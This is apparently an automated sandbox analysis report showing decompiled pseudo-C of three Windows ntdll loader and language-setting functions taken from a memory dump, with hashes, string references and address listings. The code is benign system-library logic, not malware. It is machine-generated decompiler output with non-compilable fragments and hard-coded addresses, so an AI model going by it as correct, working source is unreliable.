String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: eeebeb327314a6d1529b958677aadcabd0580ba781032561efe68ddcbe2a0c6c
Instruction ID: 44e30691a8b5a5d83482019da051ce3af816ac61d9b96f5b5e7af0168c885dc6
Opcode Fuzzy Hash: eeebeb327314a6d1529b958677aadcabd0580ba781032561efe68ddcbe2a0c6c
Instruction Fuzzy Hash: C161A73B811194DFC2058B47E888D6473E5EB0C720B568B6BF50DAB311D768EC91EF69

Uniqueness

Uniqueness Score: -1.00%

Function 1E3D8E00, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 126
timeCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E1E3D8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x1e49d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1e498464; // 0x74b10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1e495780 & 0x00000003) != 0) {
							E1E425510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1e495780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E1E3EB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1e497984; // 0x702b80
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1e498464; // 0x74b10110
					 *0x1e49b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E1E3D9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1e495780 & 0x00000005) != 0) {
						_push(_t49);
						E1E425510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x1e3d8e0f
0x1e3d8e16
0x1e3d8e19
0x1e3d8e1b
0x1e3d8e21
0x1e3d8e7f
0x1e3d8e85
0x1e419354
0x1e41936c
0x1e419371
0x1e41937b
0x1e419381
0x1e419381
0x1e41937b
0x1e3d8e9d
0x1e3d8e9d
0x1e3d8e29
0x1e3d8e2c
0x1e3d8e38
0x1e3d8e3e
0x1e3d8e43
0x1e3d8eb5
0x1e3d8eb9
0x1e4192aa
0x1e4192af
0x1e4192e8
0x1e4192e8
0x1e4192af
0x1e3d8eb9
0x1e3d8e45
0x1e3d8e53
0x1e3d8e5b
0x1e3d8e5f
0x1e3d8e78
0x1e3d8e78
0x1e3d8e7d
0x1e3d8ec3
0x1e3d8ecd
0x1e3d8ed2
0x1e3d8ed2
0x1e3d8ec5
0x1e3d8ec5
0x00000000
0x1e3d8e7d
0x1e3d8e67
0x1e3d8ea4
0x1e41931a
0x00000000
0x00000000
0x1e419320
0x1e3d8ea4
0x1e3d8e70
0x1e419325
0x1e419340
0x1e419345
0x1e419345
0x1e3d8e76
0x00000000
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 1E3D8E53

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 1E41933B, 1E419367
Querying the active activation context failed with status 0x%08lx, xrefs: 1E419357
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1E41932A
LdrpFindDllActivationContext, xrefs: 1E419331, 1E41935D

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: e3ae310800b2d119b1e4e1a7cc4c1b3997d21246b596edcaa751ef5fc2424314
Instruction ID: e0526d5ec8df3a5b9409c9e9e0638c28807f8fa09bbff3364ffb9be08153f0c8
Opcode Fuzzy Hash: e3ae310800b2d119b1e4e1a7cc4c1b3997d21246b596edcaa751ef5fc2424314
Instruction Fuzzy Hash: 4C414A33D003569FDB14AB19CC98A69F2BEBB84204F86476AE90D67150E770FD888FD1

Uniqueness

Uniqueness Score: -1.00%

Function 1E3B3D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E1E3B3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E1E3B1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E1E3B1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E1E3B1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E1E3B1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E1E3B1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L1E3C4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E1E3EF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E1E3F1370(_t276, 0x1e384e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E1E3EBB40(0,  &_v68, _t170);
									if(L1E3B43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E1E3EBB40(_t257,  &_v68, _t243);
								if(L1E3B43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E1E3F1370(_t278, 0x1e384e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L1E3C4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E1E3EF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E1E3F1370(_v16, 0x1e384e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E1E3EBB40(_t262,  &_v68, _t244);
								if(L1E3B43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E1E3F1370(_t282, 0x1e384e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E1E3EBB40(_t262,  &_v68, _t201);
							if(L1E3B43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L1E3C4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E1E3EF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E1E3F1370(_t280, 0x1e384e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E1E3EBB40(_t267,  &_v68, _t245);
							if(L1E3B43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E1E3F1370(_t284, 0x1e384e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E1E3EBB40(_t267,  &_v68, _t224);
						if(L1E3B43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x1e3b3d3c
0x1e3b3d42
0x1e3b3d44
0x1e3b3d46
0x1e3b3d49
0x1e3b3d4c
0x1e3b3d4f
0x1e3b3d52
0x1e3b3d55
0x1e3b3d58
0x1e3b3d5b
0x1e3b3d5f
0x1e3b3d61
0x1e3b3d66
0x1e408213
0x1e408218
0x1e3b4085
0x1e3b4088
0x1e3b408e
0x1e3b4094
0x1e3b409a
0x1e3b40a0
0x1e3b40a6
0x1e3b40a9
0x1e3b40af
0x1e3b40b6
0x1e3b40bd
0x1e3b40bd
0x1e3b3d83
0x1e40821f
0x1e408229
0x1e408238
0x1e408238
0x1e40823d
0x1e40823d
0x1e3b3da0
0x1e3b3daf
0x1e3b3db5
0x1e3b3dba
0x1e3b3dba
0x1e3b3dd4
0x1e3b3e94
0x1e3b3eab
0x1e3b3f6d
0x1e3b3f84
0x1e3b406b
0x1e3b406b
0x1e3b406e
0x1e3b406e
0x1e3b4070
0x1e3b4074
0x1e408351
0x1e408351
0x1e3b407a
0x1e3b407f
0x1e40835d
0x1e408370
0x1e408377
0x1e408379
0x1e40837c
0x1e40837c
0x1e40835d
0x00000000
0x1e3b407f
0x1e3b3f8a
0x1e3b3f8d
0x1e3b3f90
0x1e3b3f95
0x1e40830d
0x1e40830f
0x1e3b3f9b
0x1e3b3fac
0x1e3b3fae
0x1e3b3fb1
0x1e3b3fb1
0x1e3b3fb6
0x1e408317
0x1e40831a
0x00000000
0x1e3b3fbc
0x1e3b3fc1
0x1e3b3fc9
0x1e3b3fd7
0x1e3b3fda
0x1e3b3fdd
0x1e3b4021
0x1e3b4021
0x1e3b4029
0x1e3b4030
0x1e3b4044
0x1e3b4046
0x1e3b4046
0x1e3b4044
0x1e3b4049
0x1e408327
0x1e408334
0x1e408339
0x1e40833c
0x1e3b404f
0x1e3b404f
0x1e3b404f
0x1e3b4051
0x1e3b4056
0x1e3b4063
0x1e3b4063
0x1e3b4068
0x00000000
0x1e3b4068
0x1e3b3fdf
0x1e3b3fe2
0x1e3b3fe4
0x1e3b3fe7
0x1e3b3fef
0x1e3b4003
0x1e3b4005
0x1e3b4005
0x1e3b400c
0x1e3b4013
0x1e3b4016
0x1e3b4017
0x1e3b401b
0x1e3b401e
0x00000000
0x1e3b401e
0x1e3b3fb6
0x1e3b3eb1
0x1e3b3eb4
0x1e3b3eb7
0x1e3b3ebc
0x1e4082a9
0x1e4082ab
0x1e3b3ec2
0x1e3b3ed3
0x1e3b3ed5
0x1e3b3ed8
0x1e3b3ed8
0x1e3b3edd
0x1e4082b3
0x1e4082b6
0x00000000
0x1e3b3ee3
0x1e3b3ee8
0x1e3b3eed
0x1e3b3ef0
0x1e3b3ef3
0x1e3b3f02
0x1e3b3f05
0x1e3b3f08
0x1e4082c0
0x1e4082c3
0x1e4082c5
0x1e4082c8
0x1e4082d0
0x1e4082e4
0x1e4082e6
0x1e4082e6
0x1e4082ed
0x1e4082f4
0x1e4082f7
0x1e4082f8
0x1e4082fc
0x1e4082ff
0x1e4082ff
0x1e3b3f0e
0x1e3b3f11
0x1e3b3f16
0x1e3b3f1d
0x1e3b3f31
0x1e408307
0x1e408307
0x1e3b3f31
0x1e3b3f39
0x1e3b3f48
0x1e3b3f4d
0x1e3b3f50
0x1e3b3f50
0x1e3b3f53
0x1e3b3f58
0x1e3b3f65
0x1e3b3f65
0x1e3b3f6a
0x00000000
0x1e3b3f6a
0x1e3b3edd
0x1e3b3dda
0x1e3b3ddd
0x1e3b3de0
0x1e3b3de5
0x1e408245
0x1e3b3deb
0x1e3b3df7
0x1e3b3dfc
0x1e3b3dfe
0x1e3b3e01
0x1e3b3e01
0x1e3b3e06
0x1e40824d
0x1e40824f
0x1e408254
0x00000000
0x1e3b3e0c
0x1e3b3e11
0x1e3b3e16
0x1e3b3e19
0x1e3b3e29
0x1e3b3e2c
0x1e3b3e2f
0x1e40825c
0x1e40825f
0x1e408261
0x1e408264
0x1e40826c
0x1e408280
0x1e408282
0x1e408282
0x1e408289
0x1e408290
0x1e408293
0x1e408294
0x1e408298
0x1e40829b
0x1e40829b
0x1e3b3e35
0x1e3b3e38
0x1e3b3e3d
0x1e3b3e44
0x1e3b3e58
0x1e4082a3
0x1e4082a3
0x1e3b3e58
0x1e3b3e60
0x1e3b3e6f
0x1e3b3e74
0x1e3b3e77
0x1e3b3e77
0x1e3b3e7a
0x1e3b3e7f
0x1e3b3e8c
0x1e3b3e8c
0x1e3b3e91
0x00000000
0x1e3b3e91

Strings

Kernel-MUI-Language-Disallowed, xrefs: 1E3B3E97
Kernel-MUI-Language-Allowed, xrefs: 1E3B3DC0
WindowsExcludedProcs, xrefs: 1E3B3D6F
Kernel-MUI-Language-SKU, xrefs: 1E3B3F70
Kernel-MUI-Number-Allowed, xrefs: 1E3B3D8C

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 0ddd6691341ac8ee9ee045f9fd01c2642d6e6908cd8baede8584f5bb7dff7fe0
Instruction ID: 916573ab56221f518e716be8783c6d11b21a37e81cb46f25694061cfd7df3106
Opcode Fuzzy Hash: 0ddd6691341ac8ee9ee045f9fd01c2642d6e6908cd8baede8584f5bb7dff7fe0
Instruction Fuzzy Hash: 8AF15E76D10259EFCB11CF99C980EDEBBB9FF48650F11066AE805E7610E775AE01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1E3B8794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E1E3B8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E1E3B934A() != 0) {
								_t159 = E1E42A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1e495780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E1E425510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1e495780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E1E3B849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E1E3B8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E1E3B8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1e495c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1e495c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E1E3C2280(_t92, 0x1e4986cc);
															_t94 = E1E479DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E1E3D61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1e495c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E1E3B8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1e495c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1e495c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E1E3EF380(_t136, 0x1e381184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E1E3C2280(_t108, 0x1e4986cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E1E3D61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E1E479D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E1E3BFFB0(_t118, _t156, 0x1e4986cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E1E3E9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x1e3b8799
0x1e3b879d
0x1e3b87a1
0x1e3b87a3
0x1e3b87a8
0x1e3b87c3
0x1e3b87c3
0x1e3b87c8
0x1e3b87d1
0x1e3b87d4
0x1e3b87d8
0x1e3b87e5
0x1e3b87ec
0x1e409bfe
0x1e409c00
0x1e409c02
0x1e409c08
0x1e409c0d
0x1e409c0f
0x1e409c14
0x1e409c2d
0x1e409c32
0x1e409c37
0x1e409c3a
0x1e409c3c
0x1e409c42
0x1e409c42
0x1e409c3c
0x1e409c02
0x1e3b87da
0x1e3b87df
0x1e3b87e3
0x00000000
0x00000000
0x1e3b87e3
0x1e3b87f2
0x00000000
0x1e3b87fb
0x1e3b87fd
0x1e3b87fe
0x1e3b880e
0x1e3b880f
0x1e3b8810
0x1e3b8814
0x1e3b881a
0x1e3b881c
0x1e3b881f
0x1e3b8821
0x1e3b8822
0x1e3b8824
0x1e3b8826
0x1e3b882c
0x1e3b882e
0x1e409c48
0x1e409c48
0x1e3b8834
0x1e3b8834
0x1e3b8837
0x00000000
0x00000000
0x1e3b8837
0x1e3b882e
0x1e3b883d
0x1e3b8840
0x1e3b8843
0x1e3b8846
0x1e3b8849
0x1e3b884c
0x1e3b884e
0x1e3b8850
0x1e3b8852
0x1e3b8854
0x1e3b8857
0x1e3b88b4
0x1e3b88b6
0x1e3b88b6
0x1e3b8859
0x1e3b8859
0x1e3b8859
0x1e3b8861
0x1e3b8866
0x1e3b886a
0x1e3b893d
0x1e3b8941
0x00000000
0x1e3b8947
0x1e3b8947
0x1e3b894a
0x1e3b894c
0x00000000
0x1e3b8952
0x1e3b8955
0x1e3b895a
0x1e3b895d
0x1e3b895d
0x1e3b895f
0x1e3b8961
0x1e3b8961
0x1e3b8968
0x00000000
0x00000000
0x1e3b896a
0x1e3b896b
0x1e3b896e
0x00000000
0x1e3b8970
0x1e3b8970
0x1e3b8970
0x1e3b8970
0x1e3b8972
0x1e3b8972
0x1e3b8974
0x00000000
0x1e3b897a
0x1e3b897a
